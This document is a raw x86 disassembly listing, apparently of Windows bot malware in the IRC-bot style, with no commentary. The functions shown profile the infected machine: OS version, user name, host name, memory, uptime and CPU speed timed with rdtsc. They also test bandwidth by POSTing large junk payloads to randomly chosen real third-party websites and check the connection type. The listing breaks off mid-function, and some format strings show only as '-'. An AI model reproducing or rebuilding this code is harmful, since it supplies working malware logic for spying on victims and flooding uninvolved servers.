push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_41D201
call sub_41CB8D
jmp short loc_41D206
; ---------------------------------------------------------------------------
loc_41D201: ; CODE XREF: sub_41D1C3+35�j
call sub_41CEAF
loc_41D206: ; CODE XREF: sub_41D1C3+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_40B149
pop ecx
push 0
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41D1C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41D21B proc near ; CODE XREF: sub_41D41B+CB�p
; sub_41D41B+DD�p ...
arg_0 = dword ptr 4
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call _rand
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41D21B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D235(char *Str)
sub_41D235 proc near ; CODE XREF: sub_41D41B+D4�p
; sub_41D41B+E6�p ...
var_34 = dword ptr -34h
Dst = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Source = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push [ebp+Str] ; Str
call _strlen
mov esi, 0FFh
cmp eax, esi
pop ecx
ja short loc_41D2A5
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
push [ebp+Str]
mov [ebp+Dst], 2
call sub_4022BD
add esp, 10h
test eax, eax
mov [ebp+var_24], eax
jz short loc_41D2A5
push 50h
call dword_444260 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_41D2A5
push 10h
lea ecx, [ebp+Dst]
push ecx
push eax
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41D2AC
loc_41D2A5: ; CODE XREF: sub_41D235+17�j
; sub_41D235+3C�j ...
xor eax, eax
jmp loc_41D3FB
; ---------------------------------------------------------------------------
loc_41D2AC: ; CODE XREF: sub_41D235+6E�j
push ebx
push edi
push 32003h ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
mov edi, ds:dword_42B038
mov ebx, eax
pop ecx
mov [ebp+Source], ebx
call edi ; GetTickCount
push eax ; Size
call sub_41ECD4
call _rand
cdq
idiv esi
mov [esp+34h+var_34], 32001h
push 0 ; Val
push ebx ; Dst
movsx esi, dl
call _memset
push 32000h ; Size
push esi ; Val
push ebx ; Dst
call _memset
push ebx ; Str
call _strlen
push 323EAh ; unsigned int
mov ebx, eax
call ??2@YAPAXI@Z ; operator new(uint)
push ebx
push [ebp+Str]
mov esi, eax
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi ; Dest
call _sprintf
push [ebp+Source] ; Source
push esi ; Dest
call _strcat
push offset asc_434A60 ; "\r\n"
push esi ; Dest
call _strcat
add esp, 40h
push esi ; Str
call _strlen
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
call edi ; GetTickCount
mov [ebp+var_18], eax
xor eax, eax
test ebx, ebx
mov [ebp+var_8], eax
jbe short loc_41D387
mov [ebp+var_10], ebx
mov ebx, 400h
jmp short loc_41D353
; ---------------------------------------------------------------------------
loc_41D350: ; CODE XREF: sub_41D235+150�j
mov eax, [ebp+var_8]
loc_41D353: ; CODE XREF: sub_41D235+119�j
mov ecx, [ebp+var_14]
sub ecx, eax
add eax, esi
cmp ecx, ebx
push 0
jnb short loc_41D365
push [ebp+var_10]
jmp short loc_41D366
; ---------------------------------------------------------------------------
loc_41D365: ; CODE XREF: sub_41D235+129�j
push ebx
loc_41D366: ; CODE XREF: sub_41D235+12E�j
push eax
push [ebp+var_4]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_41D3FE
add [ebp+var_8], ebx
mov eax, [ebp+var_8]
sub [ebp+var_10], ebx
cmp eax, [ebp+var_14]
jb short loc_41D350
loc_41D387: ; CODE XREF: sub_41D235+10F�j
call edi ; GetTickCount
sub eax, [ebp+var_18]
test eax, eax
mov [ebp+var_18], eax
fild [ebp+var_18]
jge short loc_41D39C
fadd ds:flt_439084
loc_41D39C: ; CODE XREF: sub_41D235+15F�j
fmul ds:flt_439080
fstp [ebp+var_10]
fld ds:flt_43907C
fld [ebp+var_10]
fucompp
fnstsw ax
test ah, 44h
jp short loc_41D3BC
fld1
fstp [ebp+var_10]
loc_41D3BC: ; CODE XREF: sub_41D235+180�j
push [ebp+var_4]
call dword_444218 ; closesocket
push [ebp+Source] ; Memory
call _free
push esi ; Memory
call _free
fild [ebp+var_14]
mov eax, [ebp+var_14]
test eax, eax
pop ecx
pop ecx
jge short loc_41D3E5
fadd ds:flt_439084
loc_41D3E5: ; CODE XREF: sub_41D235+1A8�j
fdiv [ebp+var_10]
fmul ds:flt_439078
fmul ds:flt_439074
call __ftol2
loc_41D3F9: ; CODE XREF: sub_41D235+1E4�j
pop edi
pop ebx
loc_41D3FB: ; CODE XREF: sub_41D235+72�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41D3FE: ; CODE XREF: sub_41D235+13E�j
push [ebp+var_4]
call dword_444218 ; closesocket
push [ebp+Source] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
xor eax, eax
jmp short loc_41D3F9
sub_41D235 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D41B(int,char *Str,int)
sub_41D41B proc near ; CODE XREF: sub_40274D+2C3E�p
Dest = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41D21B
push [ebp+eax*4+var_3C] ; Str
call sub_41D235
push 8
mov esi, eax
call sub_41D21B
push [ebp+eax*4+var_3C] ; Str
call sub_41D235
add esp, 10h
test esi, esi
jz short loc_41D51C
test eax, eax
jz short loc_41D518
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41D51E
; ---------------------------------------------------------------------------
loc_41D518: ; CODE XREF: sub_41D41B+F4�j
mov ebx, esi
jmp short loc_41D51E
; ---------------------------------------------------------------------------
loc_41D51C: ; CODE XREF: sub_41D41B+F0�j
mov ebx, eax
loc_41D51E: ; CODE XREF: sub_41D41B+FB�j
; sub_41D41B+FF�j
push 0Ch
call sub_41D21B
push [ebp+eax*4+var_6C] ; Str
call sub_41D235
push 0Ch
mov edi, eax
call sub_41D21B
push [ebp+eax*4+var_6C] ; Str
call sub_41D235
add esp, 10h
test edi, edi
jz short loc_41D556
test eax, eax
jz short loc_41D552
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41D558
; ---------------------------------------------------------------------------
loc_41D552: ; CODE XREF: sub_41D41B+12E�j
mov esi, edi
jmp short loc_41D558
; ---------------------------------------------------------------------------
loc_41D556: ; CODE XREF: sub_41D41B+12A�j
mov esi, eax
loc_41D558: ; CODE XREF: sub_41D41B+135�j
; sub_41D41B+139�j
push 6
call sub_41D21B
push [ebp+eax*4+var_1C] ; Str
call sub_41D235
push 6
mov edi, eax
call sub_41D21B
push [ebp+eax*4+var_1C] ; Str
call sub_41D235
add esp, 10h
test edi, edi
jz short loc_41D590
test eax, eax
jz short loc_41D58C
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41D592
; ---------------------------------------------------------------------------
loc_41D58C: ; CODE XREF: sub_41D41B+168�j
mov ecx, edi
jmp short loc_41D592
; ---------------------------------------------------------------------------
loc_41D590: ; CODE XREF: sub_41D41B+164�j
mov ecx, eax
loc_41D592: ; CODE XREF: sub_41D41B+16F�j
; sub_41D41B+173�j
xor eax, eax
test ebx, ebx
jz short loc_41D59F
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41D5A2
; ---------------------------------------------------------------------------
loc_41D59F: ; CODE XREF: sub_41D41B+17B�j
push 2
pop edi
loc_41D5A2: ; CODE XREF: sub_41D41B+182�j
test esi, esi
jz short loc_41D5AA
add eax, esi
jmp short loc_41D5AB
; ---------------------------------------------------------------------------
loc_41D5AA: ; CODE XREF: sub_41D41B+189�j
dec edi
loc_41D5AB: ; CODE XREF: sub_41D41B+18D�j
test ecx, ecx
jz short loc_41D5B3
add eax, ecx
jmp short loc_41D5B4
; ---------------------------------------------------------------------------
loc_41D5B3: ; CODE XREF: sub_41D41B+192�j
dec edi
loc_41D5B4: ; CODE XREF: sub_41D41B+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+Dest]
push offset asc_4390C0 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41D41B endp
; =============== S U B R O U T I N E =======================================
sub_41D5F8 proc near ; CODE XREF: sub_40274D+23AA�p
; sub_40274D+27E2�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_42B038 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h ; Count
mov esi, offset byte_4E27B8
push esi ; Dest
call __snprintf
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_41D5F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_41D64B proc near ; CODE XREF: sub_419FFD+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
lea ebp, [esp-78h]
sub esp, 94h
push esi
lea eax, [ebp+78h+var_94]
push eax
xor esi, esi
mov [ebp+78h+var_94], 94h
call ds:dword_42B064 ; GetVersionExA
test eax, eax
jz short loc_41D6BB
cmp [ebp+78h+var_90], 4
jnz short loc_41D69D
cmp [ebp+78h+var_8C], esi
jnz short loc_41D68B
cmp [ebp+78h+var_84], 1
jnz short loc_41D680
inc esi
loc_41D680: ; CODE XREF: sub_41D64B+32�j
cmp [ebp+78h+var_84], 2
jnz short loc_41D6BB
xor esi, esi
inc esi
jmp short loc_41D6BB
; ---------------------------------------------------------------------------
loc_41D68B: ; CODE XREF: sub_41D64B+2C�j
cmp [ebp+78h+var_8C], 0Ah
jnz short loc_41D695
loc_41D691: ; CODE XREF: sub_41D64B+5B�j
push 2
jmp short loc_41D6BA
; ---------------------------------------------------------------------------
loc_41D695: ; CODE XREF: sub_41D64B+44�j
cmp [ebp+78h+var_8C], 5Ah
jnz short loc_41D6BB
jmp short loc_41D6AE
; ---------------------------------------------------------------------------
loc_41D69D: ; CODE XREF: sub_41D64B+27�j
cmp [ebp+78h+var_90], 5
jnz short loc_41D6BB
cmp [ebp+78h+var_8C], esi
jz short loc_41D691
cmp [ebp+78h+var_8C], 1
jnz short loc_41D6B2
loc_41D6AE: ; CODE XREF: sub_41D64B+50�j
push 3
jmp short loc_41D6BA
; ---------------------------------------------------------------------------
loc_41D6B2: ; CODE XREF: sub_41D64B+61�j
cmp [ebp+78h+var_8C], 2
jnz short loc_41D6BB
push 7
loc_41D6BA: ; CODE XREF: sub_41D64B+48�j
; sub_41D64B+65�j
pop esi
loc_41D6BB: ; CODE XREF: sub_41D64B+21�j
; sub_41D64B+39�j ...
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_41D64B endp
; =============== S U B R O U T I N E =======================================
sub_41D6C3 proc near ; CODE XREF: sub_41D779+245�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_41D6CB: ; CODE XREF: sub_41D6C3+2F�j
; sub_41D6C3+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call ds:dword_42B014 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call __aulldiv
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_41D6CB
jb short loc_41D6FA
cmp ebx, edi
ja short loc_41D6CB
loc_41D6FA: ; CODE XREF: sub_41D6C3+31�j
push 0
push 64h
push esi
push ebx
call __aullrem
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_41D76D
jb short loc_41D719
cmp edi, 50h
jnb short loc_41D71E
loc_41D719: ; CODE XREF: sub_41D6C3+4F�j
push 4Bh
pop eax
xor edx, edx
loc_41D71E: ; CODE XREF: sub_41D6C3+54�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D729
cmp edi, 47h
jnb short loc_41D72E
loc_41D729: ; CODE XREF: sub_41D6C3+5F�j
push 42h
pop eax
xor edx, edx
loc_41D72E: ; CODE XREF: sub_41D6C3+64�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D739
cmp edi, 37h
jnb short loc_41D73E
loc_41D739: ; CODE XREF: sub_41D6C3+6F�j
push 32h
pop eax
xor edx, edx
loc_41D73E: ; CODE XREF: sub_41D6C3+74�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D749
cmp edi, 26h
jnb short loc_41D74E
loc_41D749: ; CODE XREF: sub_41D6C3+7F�j
push 21h
pop eax
xor edx, edx
loc_41D74E: ; CODE XREF: sub_41D6C3+84�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D759
cmp edi, 1Eh
jnb short loc_41D75E
loc_41D759: ; CODE XREF: sub_41D6C3+8F�j
push 19h
pop eax
xor edx, edx
loc_41D75E: ; CODE XREF: sub_41D6C3+94�j
test ecx, ecx
ja short loc_41D76D
jb short loc_41D769
cmp edi, 0Ah
jnb short loc_41D76D
loc_41D769: ; CODE XREF: sub_41D6C3+9F�j
xor eax, eax
xor edx, edx
loc_41D76D: ; CODE XREF: sub_41D6C3+4D�j
; sub_41D6C3+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_41D6C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_41D779 proc near ; CODE XREF: sub_40274D+2565�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
FullPath = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
Dest = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
Dst = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Drive = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], offset byte_42B633
mov [ebp+70h+var_CC], 94h
call ds:dword_42B064 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_41D7EA
cmp [ebp+70h+var_C4], ebx
jnz short loc_41D7CC
cmp [ebp+70h+var_BC], 1
jnz short loc_41D7B9
mov [ebp+70h+var_4], offset a95 ; "95"
loc_41D7B9: ; CODE XREF: sub_41D779+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_41D850
mov [ebp+70h+var_4], offset aNt_0 ; "NT"
jmp short loc_41D827
; ---------------------------------------------------------------------------
loc_41D7CC: ; CODE XREF: sub_41D779+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_41D7DB
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D7DB: ; CODE XREF: sub_41D779+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_41D81A
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D7EA: ; CODE XREF: sub_41D779+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_41D81A
cmp [ebp+70h+var_C4], ebx
jnz short loc_41D7FE
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D7FE: ; CODE XREF: sub_41D779+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_41D80D
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_41D821
; ---------------------------------------------------------------------------
loc_41D80D: ; CODE XREF: sub_41D779+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_41D821
loc_41D81A: ; CODE XREF: sub_41D779+66�j
; sub_41D779+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_41D821: ; CODE XREF: sub_41D779+60�j
; sub_41D779+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_41D850
loc_41D827: ; CODE XREF: sub_41D779+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_41D850
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+Dest]
push offset aSS_5 ; "%s (%s)"
push eax ; Dest
call _sprintf
lea eax, [ebp+70h+Dest]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_41D850: ; CODE XREF: sub_41D779+44�j
; sub_41D779+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_444198
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_41D883
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_41D883: ; CODE XREF: sub_41D779+FB�j
push [ebp+70h+arg_4]
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_4441FC ; gethostbyaddr
cmp eax, ebx
jz short loc_41D8AC
push dword ptr [eax]
jmp short loc_41D8B1
; ---------------------------------------------------------------------------
loc_41D8AC: ; CODE XREF: sub_41D779+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41D8B1: ; CODE XREF: sub_41D779+131�j
lea eax, [ebp+70h+var_3E4]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+FullPath]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_42B0C4 ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_42B0C0 ; GetTimeFormatA
push 20h ; Size
lea eax, [ebp+70h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+70h+Dst]
push eax
call ds:dword_42B134 ; GlobalMemoryStatus
push ebx ; Ext
push ebx ; Filename
push ebx ; Dir
lea eax, [ebp+70h+Drive]
push eax ; Drive
lea eax, [ebp+70h+FullPath]
push eax ; FullPath
call __splitpath
lea eax, [ebp+70h+Drive]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_419549
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_41D5F8
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+FullPath]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_419443
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_419443
pop ecx
pop ecx
push eax
call sub_41D6C3
push edx
push eax
push offset asc_4392D8 ; "-"
push 200h ; Count
push [ebp+70h+arg_0] ; Dest
call __snprintf
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_41D779 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_41D9E5 proc near ; CODE XREF: sub_40274D+2593�p
; sub_40274D+6F0C�p
Dst = byte ptr -8Ch
var_C = byte ptr -0Ch
Dest = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push esi
mov esi, 80h
push esi ; Size
lea eax, [ebp+6Ch+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp dword_44428C, 0
jnz short loc_41DA52
push 0
push esi
lea eax, [ebp+6Ch+Dst]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_44425C ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41DA33
lea eax, [ebp+6Ch+Dst]
push offset aNotConnected ; "Not connected"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41DA33: ; CODE XREF: sub_41D9E5+3C�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+Dest]
jz short loc_41DA4B
push offset aDialUp ; "Dial-up"
loc_41DA41: ; CODE XREF: sub_41D9E5+6B�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_41DA6E
; ---------------------------------------------------------------------------
loc_41DA4B: ; CODE XREF: sub_41D9E5+55�j
push offset off_439428
jmp short loc_41DA41
; ---------------------------------------------------------------------------
loc_41DA52: ; CODE XREF: sub_41D9E5+27�j
mov esi, offset off_439424
lea eax, [ebp+6Ch+Dest]
push esi ; Format
push eax ; Dest
call _sprintf
lea eax, [ebp+6Ch+Dst]
push esi ; Format
push eax ; Dest
call _sprintf
add esp, 10h
loc_41DA6E: ; CODE XREF: sub_41D9E5+64�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+6Ch+Dst]
push eax
lea eax, [ebp+6Ch+Dest]
push eax
push offset asc_4393E0 ; "-"
push 200h ; Count
push [ebp+6Ch+arg_0] ; Dest
call __snprintf
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
pop esi
add ebp, 6Ch
leave
retn
sub_41D9E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41DAA1 proc near ; DATA XREF: sub_40274D+7345�o
var_65C = byte ptr -65Ch
Dest = byte ptr -55Ch
var_35C = dword ptr -35Ch
Str = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
Dst = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
Source = dword ptr -38h
Count = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 65Ch
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_35C]
rep movsd
xor esi, esi
xor ebx, ebx
mov edi, 80h
inc esi
push edi ; Size
mov [eax+190h], esi
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_4], ebx
mov [ebp+74h+var_C], offset dword_439514
call _memset
push edi ; Size
lea eax, [ebp+74h+var_1C8]
push ebx ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+74h+var_C8]
push ebx ; Val
push eax ; Dst
call _memset
push 100h ; Size
lea eax, [ebp+74h+var_65C]
push ebx ; Val
push eax ; Dst
call _memset
push 3Ch
pop edi
push edi ; Size
lea eax, [ebp+74h+var_48]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 3Ch
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+Str]
push ebx
push eax ; Str
mov [ebp+74h+var_48], edi
mov [ebp+74h+Count], esi
mov [ebp+74h+var_28], esi
mov [ebp+74h+var_20], esi
mov [ebp+74h+var_18], esi
call _strlen
pop ecx
push eax
lea eax, [ebp+74h+Str]
push eax
call dword_444070 ; InternetCrackUrlA
test eax, eax
jnz short loc_41DB71
lea eax, [ebp+74h+Dest]
push offset asc_4394F8 ; "-"
push eax ; Dest
call _sprintf
mov esi, ebx
jmp loc_41DC60
; ---------------------------------------------------------------------------
loc_41DB71: ; CODE XREF: sub_41DAA1+B6�j
cmp [ebp+74h+Count], ebx
jbe short loc_41DB8B
push [ebp+74h+Count] ; Count
lea eax, [ebp+74h+Dst]
push [ebp+74h+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41DB8B: ; CODE XREF: sub_41DAA1+D3�j
cmp [ebp+74h+var_28], ebx
movzx esi, [ebp+74h+var_30]
jbe short loc_41DBA9
push [ebp+74h+var_28] ; Count
lea eax, [ebp+74h+var_1C8]
push [ebp+74h+var_2C] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41DBA9: ; CODE XREF: sub_41DAA1+F1�j
cmp [ebp+74h+var_20], ebx
jbe short loc_41DBC0
push [ebp+74h+var_20] ; Count
lea eax, [ebp+74h+var_C8]
push [ebp+74h+var_24] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41DBC0: ; CODE XREF: sub_41DAA1+10B�j
cmp [ebp+74h+var_18], ebx
jbe short loc_41DBDA
push [ebp+74h+var_18] ; Count
lea eax, [ebp+74h+var_65C]
push [ebp+74h+var_1C] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
